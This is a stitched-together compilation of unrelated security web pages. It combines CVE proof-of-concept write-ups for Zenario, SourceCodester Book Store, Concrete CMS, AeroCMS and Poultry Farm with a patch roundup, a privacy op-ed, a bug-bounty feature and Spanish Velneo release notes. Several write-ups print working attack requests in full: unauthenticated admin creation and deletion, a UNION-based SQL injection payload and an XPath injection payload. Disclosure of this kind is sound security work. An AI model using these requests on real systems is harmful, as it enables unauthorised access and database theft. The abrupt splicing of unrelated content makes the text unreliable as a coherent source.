A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS 9.3.57595. This issue affects some unknown processing of the component Remember Me Handler. The manipulation leads to session fixiation. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214589 was assigned to this vulnerability.

Description: In Zenario CMS user session identifier (authentication token) is issued to the browser prior to authentication but is not changed after user logout and login again into the application when "Remember me" option active. Failing to issue a new session ID following a successful login introduces the possibility for an attacker to set up a trap session on the device the victim is likely to login with.

The product(s): https://zenar.io

Affected product(s)/code base: https://github.com/TribalSystems/Zenario

Affected component(s): /Zenario-9.3.57595/zenario/admin/welcome.ajax.php

Tested version: Zenario-9.3.57595

Proof of Concept:

1.  Logout with current session to confirm the session is not valid

Burpsuite Request:

POST /Zenario-9.3.57595/zenario/admin/welcome.ajax.php?task=logout&get=%7B%22task%22%3A%22logout%22%2C%22cID%22%3A%221%22%2C%22cType%22%3A%22html%22%7D HTTP/1.1
Host: localhost
Content-Length: 19
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Zenario-9.3.57595/admin.php?task=logout&cID=1&cType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: PHPSESSID-Zenario\_9\_3\_57595=mbu2ar0qnut2bmibuka94fq1ue
Connection: close

\_fill=true&\_values=

To confirm, request change password for admin is not success.

2.  Login as administrator with "Remember me".

Burpsuite Request:

POST /Zenario-9.3.57595/zenario/admin/welcome.ajax.php?task=&get=%7B%22cID%22%3A%221%22%2C%22cType%22%3A%22html%22%7D HTTP/1.1
Host: localhost
Content-Length: 726
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Zenario-9.3.57595/admin.php?cID=1&cType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: PHPSESSID-Zenario\_9\_3\_57595=mbu2ar0qnut2bmibuka94fq1ue
Connection: close

\_validate=true&\_box={"tab"%3a"~login","tabs"%3a{"login"%3a{"edit\_mode"%3a{"on"%3a1},"fields"%3a{"reset"%3a{"\_was\_hidden\_before"%3atrue},"description"%3a{},"secure\_connection"%3a{"\_was\_hidden\_before"%3atrue},"not\_secure\_connection"%3a{},"username"%3a{"current\_value"%3a"~leecybersec~40gmail~2Ecom"},"password"%3a{"current\_value"%3a"~leecybersec"},"admin\_login\_captcha"%3a{"\_was\_hidden\_before"%3atrue,"current\_value"%3a""},"remember\_me"%3a{"current\_value"%3atrue},"admin\_link"%3a{},"login"%3a{"pressed"%3atrue},"forgot"%3a{"pressed"%3afalse},"previous"%3a{"pressed"%3afalse}}},"forgot"%3a{"edit\_mode"%3a{"on"%3a1},"fields"%3a{"description"%3a{},"email"%3a{"current\_value"%3a""},"previous"%3a{},"reset"%3a{}}}},"path"%3a"~login"}

To confirm, request change password for admin is success.

Discoverer(s)/Credits: CMCSOC Redteam (@lithonn)

*   Ngo Van Tu (@leecybersec)
*   Tran Thi Nho (@nhott)
*   Huynh Nhat Hao (@h40huynh)
*   Le Thi Huyen My (@Huy3nMy)

CVE-2022-4231: bug-report/vendors/tribalsystems/zenario/session-fixation at main · lithonn/bug-report

A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.

Description: Vulnerability was found in SourceCodester Book Store Management System 1.0. This vulnerability allows a remote attacker to access all URLs without logging in and use all actions like account management page.

The product(s): https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html

Affected product(s)/code base: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms\_ci.zip

Affected component(s):

*   /bsms\_ci/index.php/category/\*
*   /bsms\_ci/index.php/book/\*
*   /bsms\_ci/index.php/transaction/\*
*   /bsms\_ci/index.php/history/\*
*   /bsms\_ci/index.php/user/\*

Proof of Concept: Access all URLs without logging in and use all actions like an admin like edit, detele, add new account.

1.  Send a request Add new account without cookie

Burpsuite Request:

POST /bsms\_ci/index.php/user/add HTTP/1.1
Host: localhost
Content-Length: 64
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms\_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

fullname=john&username=john&password=12345&level=admin&save=Save

Image:

2.  Send a request Delete account without cookie

Burpsuite Request:

GET /bsms\_ci/index.php/user/hapus/2 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms\_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Image:

Discoverer(s)/Credits: CMCSOC Redteam (@lithonn)

*   Ngo Van Tu (@leecybersec)
*   Tran Thi Nho (@nhott)
*   Huynh Nhat Hao (@h40huynh)
*   Le Thi Huyen My (@Huy3nMy)

CVE-2022-4229: bug-report/vendors/oretnom23/bsms_ci/broken-access-control at main · lithonn/bug-report

Plus: Major patches dropped this month for Chrome, Firefox, VMware, Cisco, Citrix, and SAP.

November saw the release of patches from the likes of Apple’s iOS, Google Chrome, Firefox, and Microsoft Windows to fix multiple security vulnerabilities. Some of these issues are pretty severe, and several have already been exploited by attackers. 

Here’s what you need to know about all the important updates released in the past month.

Apple iOS and iPadOS 16.1.1

Apple has released iOS and iPadOS 16.1.1, which the iPhone maker recommends all users apply. The patch fixes two security vulnerabilities—and given the speed of the release, you can assume they are pretty serious. 

Tracked as CVE-2022-40303 and CVE-2022-40304, the two flaws in the libxml2 software library could allow an attacker to execute code remotely, according to Apple’s support page. The issues were both reported by security researchers working for Google’s Project Zero. 

For Mac users, the flaws were addressed by macOS Ventura 13.0.1.

The good news is, it’s believed neither vulnerability has been exploited by attackers, but it’s still a good idea to apply the update as soon as possible. 

Microsoft Windows

Microsoft’s November Patch Tuesday was another big release, seeing the Windows maker fix 68 vulnerabilities, four of which were zero days. 

Tracked as CVE-2022-41073, the first is a Windows print spooler elevation of privilege vulnerability that could allow a cybercriminal to gain system privileges. Meanwhile, CVE-2022-41125 is a Windows Cryptographic Next Generation key isolation issue that could allow an adversary to escalate privileges and gain control of the system. CVE-2022-41128 is a Windows scripting language vulnerability that could result in remote code execution. Lastly, CVE-2022-41091 is a vulnerability in Microsoft’s Mark of the Web security feature.

Google Android

More big updates for users of Google’s Android devices have arrived in November, with Google issuing patches for multiple vulnerabilities, some of which are serious. At the top of the list is a high-severity vulnerability in the Framework component that could lead to local escalation of privilege, Google said in a security advisory.

The patches in November include two Google Play system updates for issues impacting the Media Framework components (CVE-2022-2209) and WiFi (CVE-2022-20463). Google also fixed five issues affecting its Pixel devices.

The Android updates have started to roll out to Samsung devices, including third- and fourth-generation Galaxy foldables. You can check for the update in your Settings. 

Google Chrome 

The world’s most popular browser continues to be a major target for attackers, with Google this month fixing its eighth zero-day vulnerability this year. 

The vulnerability, tracked as CVE-2022-4135, is a heap buffer overflow in GPU reported by Clement Lecigne, a researcher in Google's own threat analysis group. Google said it “is aware that an exploit for CVE-2022-4135 exists in the wild.”

Earlier in the month, Google issued an update to fix 10 Chrome vulnerabilities, six of which are rated as high-severity. These include four use-after-free bugs: CVE-2022-3885, CVE-2022-3886, CVE-2022-3887, and CVE-2022-3888. Meanwhile, CVE-2022-3889 is a “type confusion” issue in V8, and CVE-2022-3890 is a heap buffer overflow in Crashpad. 

Mozilla Firefox

November was also a big month for Google Chrome competitor Firefox. Mozilla has issued Firefox 107, fixing 19 security vulnerabilities, eight of which are marked as having a high impact. 

One of the most important patches is for CVE-2022-45404, a full-screen notification bypass that could allow an attacker to cause a window to go full-screen without the user seeing the notification prompt. This could result in spoofing attacks. Meanwhile, several use-after-free bugs could lead to an exploitable crash, and one flaw could be exploited to run arbitrary code.

VMWare

Software maker VMWare has released security fixes for multiple security vulnerabilities in its VMware Workspace ONE Assist, three of which have a CVSSv3 base score of 9.8. The first, CVE-2022-31685, is an authentication bypass vulnerability. “A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned in an advisory.

A broken authentication method vulnerability tracked as CVE-2022-31686 could enable a malicious actor with network access to obtain admin access without the need to authenticate.

Drop What You're Doing and Update iOS, Android, and Windows

A lack of federal regulatory legislation leaves US privacy concerns to battle for attention with other business priorities.

Over the past 15 years, several events have reshaped how we think about data — what it means from a business perspective and what rights individuals have regarding how their personal information is used. Data security governance undoubtedly will play a large role in the future; however, conversations are still in relatively early stages. 

In 2016, when European regulators created the General Data Protection Regulation (GDPR) as a legislative framework that clearly mandates rules and fines, a fundamental shift occurred that elevated privacy to a board-level discussion. This resulted in CEOs taking part in the conversation while empowering the C-suite to make more decisions. 

Next, the data culture quickly evolved from one of implicit trust (where organizations freely used data without much restriction) to limiting risk (controlling data access based on regulations and customer feedback). While the data protection industry in Europe has made great strides since GDPR came into existence, we still have a long way to go because, for decades, technology solutions were built without privacy in mind. 

In the United States, the picture is quite different, as the lack of federal regulatory legislation leaves privacy concerns to battle for attention with other business priorities. Let's dig deeper into what the future of data privacy looks like across the pond. 

**Beyond Cookies: Delving Beneath the Data Veneer**

Marketplaces built around selling data need to pivot, because the future is about protecting individual data rights and that change goes far beyond a website pop-up asking to approve the use of cookies. Historically, data brokers have cashed in on users' data, which precipitated state laws in Vermont and California that aim to protect consumers by identifying the brokers and determining how they use the information. 

Tech giants like Apple and Google have also increased privacy protections with app-tracking transparency and plans to phase out third-party cookies. These titans of industry are pioneering an important movement that other companies need to follow. There's hope that legislation may spark further change, especially with privacy receiving bipartisan support.

If the American Data Privacy and Protection Act (ADPPA) takes effect in the United States, the biggest win would be a common standard for how to handle data. States like California have already established stricter standards for data privacy through the California Consumer Privacy Act (CCPA). Compliance requirements and hefty fines would be important accelerators in protecting consumer data. 

**Privacy Needs Security **

A comprehensive data security strategy is essential and a prerequisite to an overall privacy-centric posture for data-driven organizations. It's imperative to implement scalable, fine-grained access controls so policies can keep the data safe in the first place.

As the pendulum shifts toward implementing broader and complete data security strategies, companies need to adjust. The work of chief information security officers (CISOs), chief data officers (CDOs), and chief information officers (CIOs) alongside their actions is more critical than ever, because they are responsible for implementing tools and processes that help align companies toward their privacy-related goals. The increased focus on a complete data security strategy applies to data-driven organizations of any size. 

A Cisco study cites that 92% of organizations claim privacy to be integral to their culture, but it comes with a technical challenge. Oftentimes, CISOs and CIOs are confronted with data spread across their organization and they need to gain visibility into all their siloed, heterogeneous data to understand who controls, maintains, processes, and accesses which parts of the data. 

This challenge is exacerbated by the need to modernize with cloud-native technologies so companies have a better understanding of how data is used and that it is used in accordance with privacy guidelines, principles, and any governing legislation. 

**A Look into the Future**

None of this happened by accident. Consumers didn't like data collection practices and they spoke up. Legislators heard from their constituents and started creating regulations like the ADPPA. Companies started serving consumers differently and taking data privacy seriously.

Consumer awareness of how data is collected and used is becoming mainstream. According to HubSpot's "2022 State of U.S. Consumer Trends Report," 80% of consumers consider data privacy a human right and believe individuals should have complete control over how companies use their data. As a result of these growing trends, more businesses should leverage privacy as a differentiator. 

There is still a gap between companies' intent to satisfy data privacy concerns and the action that protects that information. As consumers become better educated about how their data is used, and legislation inches closer to reality, it becomes even more critical. Making the right investments in data security provides visibility, access control, and insights into your data while ensuring compliance, and can help make all the difference.

Why the Culture Shift on Privacy and Security Means Today's Data Looks Different

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

As seven-figure vulnerability rewards continue to hit headlines, what is driving bug bounty inflation?

As seven-figure vulnerability rewards continue to hit headlines, what is driving bug bounty inflation?

  

Bug bounty rewards have breached the $1 million mark, and there are reports of even higher payouts within the ethical hacking community.

But are these ‘mega bounties’ good for security researchers, and the firms that offer them? And are they truly achievable for those partaking?

In early 2022, a security researcher named ‘satya0x’ earned $10 million for discovering a vulnerability in crypto platform Wormhole. The reward was paid through Immunefi and – so far, at least – stands as the largest bug bounty payout so far.

Although another eight-figure bounty reward has yet to be awarded, there is clearly a trend of growing payouts. For example, another Immunefi user, ‘pwning.eth’, recently earned $6 million for reporting a critical vulnerability in the Aurora crypto service.

**Apple harvest**

More and more tech giants are also offering significant sums.

Apple is reported to have paid out $20 million via its bounty program, and the vendor offers up to $2 million for reports of vulnerabilities that bypass “the specific protections of Lockdown Mode” on its devices, although bounties more typically range from $5,000 to $250,000.

Intel also operates an in-house bounty program, and views offering larger rewards as evidence that a firm is taking security seriously.

“Intel offers bug bounty rewards up to $100,000 for eligible vulnerabilities submitted through the Intel Bug Bounty Program,” Katie Noble, Intel’s director for the product security incident response team and bug bounty program, told The Daily Swig.

“In my experience, high bounty award offers tend to show a company’s commitment to the bug bounty and wider security community,” The company is open about the extent of its program, the researchers who have contributed, and the areas they reported.

RELATED Ethereum Foundation offers $1m bug bounty payouts with proof-of-stake migration multiplier

  
**Bounty inflation factors**

The trend of ever-larger payouts is not just a result of organizations’ greater focus on security. There is also growing competition between bug bounty programs, with the best researchers in high demand.

“Increasing bug bounty payouts are likely the result of market forces, as some researchers may split between two companies’ programs or work on both,” says Intel’s Noble.

“It is also likely a reflection of inflation and the attempt to close the underground market and incentivize ethical, coordinated vulnerability disclosure.”

Competition is especially intense among web 3.0 and crypto platforms, which are also offering the largest rewards. But these also demand the most specialist expertise.

And some organizations may simply be looking for positive PR. A large potential bounty generates publicity, but costs nothing if it is never awarded.

“It is quite easy to have a program with high bounties that are impossible to reach, creating false perceptions or for PR only,” Florian Badertscher CTO and co-founder of Bug Bounty Switzerland, told The Daily Swig.

YOU MAY ALSO LIKE HackerOne encourages customers to adopt standard policy to protect hackers from legal problems

Rewards obviously tend to track with severity, but also reflect how much unethical researchers could earn from selling vulnerabilities on the black market.

“Some of the larger bounties, which certainly seemed to be justified when you see the severity of the issue, are very rare in comparison to the normal payments that most people are getting,” Quentyn Taylor, CISO at Canon Europe, told The Daily Swig.

“It is the vulnerabilities that would have alternative marketability that seem to attract the highest bounty payouts.”

Dane Sherrets, senior security architect at HackerOne, agrees. He points out that the largest bug bounties are in the crypto space due to the financial risks those vulnerabilities pose.

“It is worth noting that in the Web3 world, bug bounty programs often serve a different function than in the more traditional Web2,” Sherrets told The Daily Swig.

“If a smart contract that has $100 million of cryptocurrency locked in it has a critical vulnerability, then that means an attacker could steal or destroy all $100 million. But, if a program offers a $1 million bug bounty, it may encourage the attacker to just report the issue and collect the bounty legally and cleanly.”

**Elite hunters**

For some of the best paying bounties, finding vulnerabilities does demand particularly niche skills. This is most common in Web 3.0 environments.

“Honestly, if we look at all the bug bounty platforms and the rewards they offer, by far the biggest rewards are paid by Immunefi, which is a crypto bug bounty platform (Web 3.0)”, Marius Avram, a consultant at Pentest People, told The Daily Swig.

“However, it should be noted that in order to participate and find vulnerabilities on these Web 3.0 applications, it is necessary to have a high level of skill.”

Finding bounties in those environments is beyond the scope of scanning tools, he says.

“It has become extremely difficult to find any vulnerabilities unless you’re an elite hunter,” explains Avram. “There are a lot of participants on these platforms who scan these sites day and night, so there is close to zero chance of finding something by scanning the sites with automated vulnerability scanners such as Burp \[Suite\], Nessus, and the like.

RELATED Lockdown Mode: Apple offers $2m bug bounty for vulnerabilities in new anti-spyware tech

“And even then, you just have to do the work by hand and that requires skill and experience. Also, let’s not forget there are some types of vulnerabilities that cannot be discovered by automated scanners.”

Invitation-only bounty programs also offer some of the largest rewards. As Avram explains, for the first phase of these private programs only ‘elite’ hunters are invited – those “with the best reputation” for reporting “quality” vulnerabilities.

Some bug hunters have formed into teams, increasing their prospects of finding significant bugs, sometimes at the expense of individual researchers.

**Mega bounties**

So, should researchers go after “mega” bounties? Much will depend on the individual’s skill set, time, and career ambitions.

A lucky few researchers will achieve significant payouts, a greater number will earn a small but useful second income, and more still will gain valuable hacking experience but earn usually modest bounties only intermittently.

As Canon Europe’s Quentyn Taylor points out, there will always be far more smaller rewards on offer, despite the lure of the larger bounties.

“Certainly whilst I believe it is possible to make a living from bug bounties, I don’t believe there’s a huge number of people doing more than supplementing their current income,” he cautions.

“I suspect the researchers doing vulnerability research as an intellectual exercise probably focus more on the individual single high value vulnerabilities. But remember that vulnerability research is all about coming first. There is no prize for second.

“If during the course of your research somebody else finds the same vulnerability and reports it, all of the time that you have spent researching that vulnerability will not be paid out,” adds Taylor.

RELATED ‘I’m not a fan of critical bugs’ – Santiago Lopez on becoming the world’s first bug bounty millionaire

“Discovering rewardable bugs is a hard task,” agrees Liam Follin, a senior consultant ant Pentest People.

“I have personally reported at least 10 bugs across a range of websites, only to be informed that they had already been reported and are therefore ineligible for reward. It is unsurprising that this is the case as many of these researchers spend 12 hours a day or more chasing these findings.”

Some hackers, too, are less motivated by financial reward and may be satisfied with mere public acknowledgement of their work.

This theory is backed by research – HackerOne’s 2021 Hacker-Powered Security Report found that the median price for a critical bug across the board was $3,000, and $1,000 for a high-severity vulnerability, $500 for a medium flaw, and just $150 for a low-severity issue.

**Risk and reward**

Nonetheless, six or seven-figure rewards are here to stay and more eight-figure payouts are surely inevitable. Firms continue to invest in bounties as a way to supplement their internal security capabilities and to show that they take vulnerabilities seriously.

“Personally, I think it helps to think about bug bounty programs and hackers as market participants in an ‘attention economy’,” says HackerOne’s Sherrets.

“As companies harden their assets, or develop business critical assets with novel technology, they will have an increased demand for hackers with the skills to find vulnerabilities on those assets.

“There’s a limited supply of hackers with the specialized skillset to hack hardened or novel assets, so higher payouts help incentivize hackers to spend time with the program.”

And, as Intel’s Katie Noble suggests, increased security spending will increase bug bounties too.

“Bug bounty programs are one piece of an organization’s larger cyber defense tool kit,” she says. “One motivation for increased resourcing in this area may be driven by increased resourcing in the entire cyber defense ecosystem.”

DON’T MISS Mastodon users vulnerable to password-stealing attacks

Million-dollar bug bounties: The rise of record-breaking payouts

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE


Velneo vClient on its 28.1.3 version, could allow an attacker with knowledge of the victims's username and hashed password to spoof the victim's id against the server.



Es conveniente leer la información siguiente antes de actualizar a esta versión

**

**Información importante sobre los ejecutables de 32 bits para Windows**



**

Esta es la última versión en la que se distribuirán los ejecutables de 32 bits para Windows.

**

**Los comandos y opciones de compactar y vaciar tabla estaban disponibles solamente en servidores cloud y con suscripción (Resuelta en 32.1)**



**

**

Nuevo sistema de activación de licencias de Velneo vServer



**

A partir de la versión 32 cambia el sistema de licenciamiento y las licencias se activarán desde

Velneo vAdmin

. Haz clic

aquí

para ampliar información al respecto.

En mi Velneo, ahora verás que una licencia tiene dos códigos distintos, uno con el formato **VLS-XXXX-XXX**, que será el que se deberá usar para activarla con la versión 32 y superiores y el otro, que usaremos cuando queramos activarla en servidores de la versión 31 o anteriores, que se seguirá activando con

Velneo vActivator

.

**

A partir de esta versión todos los servidores arrancarán con protocolo VATPS



**

El

protocolo VATPS

permite establecer conexiones seguras estándar TLS/SSL lo que provee de privacidad e integridad a las comunicaciones en red entre todos los componentes de Velneo. Es decir, no solo la comunicación se envía cifrada entre los componentes, si no que es inviolable, ya que garantiza que nadie puede modificar la información que se transmite, además de garantizarnos con qué servidor nos hemos conectado.

**

Incidencia con controles dibujo en dispositivos con procesadores Apple Silicon con sistema operativo Ventura



**

Hemos detectado una incidencia que produce un efecto de ralentización del interfaz la primera vez durante unos segundos cuando visualizamos o editamos un formulario con un control dibujo/objeto dibujo. Parece una incidencia de sistema operativo, ya que este efecto se produce también en versiones anteriores ya publicadas en las que no se observaba ese comportamiento y ha comenzado a producirse tras la última actualización de macOS Ventura en equipos con procesadores Apple Silicon.

**

Mejoras de seguridad en validación de usuario y contraseña



**

Con el fin de mejorar la seguridad del

inicio de sesión

en Velneo, se evita enviar el hash de la contraseña, sustituyendo el sistema de login con uno más moderno y seguro.

En breve, aparecerá publicado en

CVE

con el fin de advertir y propiciar la actualización a esta versión.

**

Funciones remotas y compatibilidad con versiones anteriores de Velneo



**

Por defecto, un servidor de la 32 no permite recibir peticiones de ejecución de funciones remotas desde versiones anteriores. En el caso de que queramos hacer esto posible, debemos una clave beta en la máquina donde tengamos instalado el servidor de la versión 32.

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración de sistema: Escribir cadena de texto

para establecerlos, ejecutándolo en 3er plano. Los parámetros se resolverán como indicamos a continuación:

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" ):

*   **Clave**: enableRetrocompatibildadFuncionesRemotas
    

*   **Valor**: 3BFD2F9B103174596FF78C23CE8DDE77EC917BEA
    

**

Rejillas: la CSS que se aplica a los ítems de rejillas, se aplican también a las columnas de campos de tipo objeto texto y objeto dibujo



**

En versiones anteriores no se aplicaban correctamente las CSS de ítem de

rejilla

en columnas de campos de tipo objeto texto enriquecido y objeto dibujo; ahora hemos mejorado la plataforma para que también las aplique.

Al aplicar el ajuste del texto (wordwrap) en una CSS, el ajuste en textos largos puede resultar distinto.

**

Cómo activar la nueva interfaz Velneo vAdmin



**

Velneo vAdmin estrena nueva interfaz. Para probarla no tienes más que

activarla

.

**

Funcionalidades no disponibles en la nueva interfaz de Velneo vAdmin y en Velneo vAdmin Web



**

*   Alta y modificación de
    
    disco
    
    .
    

**

Mejoras de rendimiento en beta



**

Si quieres disfrutar de la versión beta de estas opciones, debes activar ciertas claves beta correspondiente en el cliente (en el caso de los objetos de interfaz) y también en el servidor (en el caso de procesos).

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración del sistema: escribir cadena texto

para establecerlos, ejecutándolo en 1º y 3º plano según corresponda. Los parámetros se resolverán como indicamos a continuación

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" )

Ejecutar la aplicación, lanzar el proceso en primero y/o tercer plano, según corresponda.

En el ámbito del cliente, las claves serán operativas en siguientes sesiones que se lancen del mismo.

En el ámbito del servidor, las claves serán operativas en cuanto se reinicie.

Estas son las distintas claves beta que podemos configurar:

*   ​
    
    Rejillas
    
    estándar, carga y movimiento optimizado (requiere el
    
    estilo
    
    _Optimizado_):
    
    *   **Clave**: optimizarRejillasClient
        
    
    *   **Valor**: 8DF627183E075E86BADCF82C11D4F931E8BF62D8
        
    

*   *   **Clave**: optimizarFormulariosClientFormulas
        
    
    *   **Valor**: ED979A19EEFC93EE0E4F58FB93F432BF258E1E33
        
    

*   Procesos, optimización de parámetros:
    
    *   **Clave**: optimizarInstruccion
        
    
    *   **Valor**: F15868161C0B05825E38ADE94001D5D9926CDFB7
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   *   **Valor**: 11B804B93A06DFED1838D5B21F309414B881EEDF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   Nuevo motor
    
    Javascript
    
    con optimización de memoria y concurrencia:
    
    *   **Clave**: enableSombrasJSClass
        
    
    *   **Valor**: F0835AF8367C2AE76BC7804F8183EEB5529C5ADF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

Última actualización 6mo ago

CVE-2021-45036: Notas de la versión

Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.

**Poultry Farm Management System v1.0 by Nikhil\_B has SQL injection**

BUG\_Author: TavenLi

vendors:https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Vulnerability File: /Redcock-Farm/farm/category.php

